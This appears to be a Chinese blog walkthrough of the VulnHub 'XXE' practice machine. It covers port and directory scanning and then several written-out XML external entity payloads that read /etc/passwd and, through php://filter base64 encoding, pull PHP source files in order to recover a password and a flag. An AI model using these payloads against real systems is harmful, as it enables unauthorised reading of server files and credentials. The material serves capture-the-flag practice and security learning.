码迷,mamicode.com
首页 > 其他好文 > 详细

vulnhub-XXE靶机

时间:2020-05-07 19:28:36      阅读:53      评论:0      收藏:0      [点我收藏+]

标签:方式   coding   问题   ref   识别   端口   点击   参数   原来   

仅供个人娱乐

靶机信息

靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip

一、主机探测

技术图片


二、端口服务识别

nmap -sV 192.168.181.149

技术图片

存在web端口  打开web界面

技术图片

三、漏洞查找和利用

扫描目录

dirb http://192.168.181.149

技术图片

打开网页

技术图片
技术图片

打开目录

技术图片
技术图片

使用burp抓包

技术图片

(个人)网络问题     靶机 ip改为 192.168.204.130

打开网络http://192.168.204.130/xxe/  进行抓包

技术图片

发现xxe文件

或者查看源码

技术图片

修改xxe格式读取密码

<?xml version="1.0" encoding="UTF-8"?>            #防止乱码

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "file:///etc/passwd">          #读取密码文件

]>

<root><name>&admin;</name><password>1</password></root>

技术图片

发现可以抓取密码

原来admin.php页面和源码为

技术图片
技术图片

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

]>

<root><name>&admin;</name><password>1</password></root>

技术图片

发现admin.php页面源码

返回包进行了加密  使用在线解密

技术图片

将密码进行cmd5解密

技术图片

进行登录  登录失败

技术图片
技术图片

点击flag

技术图片

查看源码没有东西

继续寻找有用信息

技术图片
技术图片

查看源码

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

]>

<root><name>&admin;</name><password>1</password></root>

技术图片

复制base64解码

技术图片

使用各种方式  解密     最后  base32密码解密

技术图片

使用base64解密

技术图片

抓包修改参数flag.php  出现乱码

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "file:///etc/.flag.php">

]>

<root><name>&admin;</name><password>1</password></root>

技术图片

查看源码

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

]>

<root><name>&admin;</name><password>1</password></root>

技术图片

使用base64解码  失败

技术图片

最终使用phpstudy,开启错误显示,本地访问这个webshell得到了flag

vulnhub-XXE靶机

标签:方式   coding   问题   ref   识别   端口   点击   参数   原来   

原文地址:https://www.cnblogs.com/bingtang123/p/12838378.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!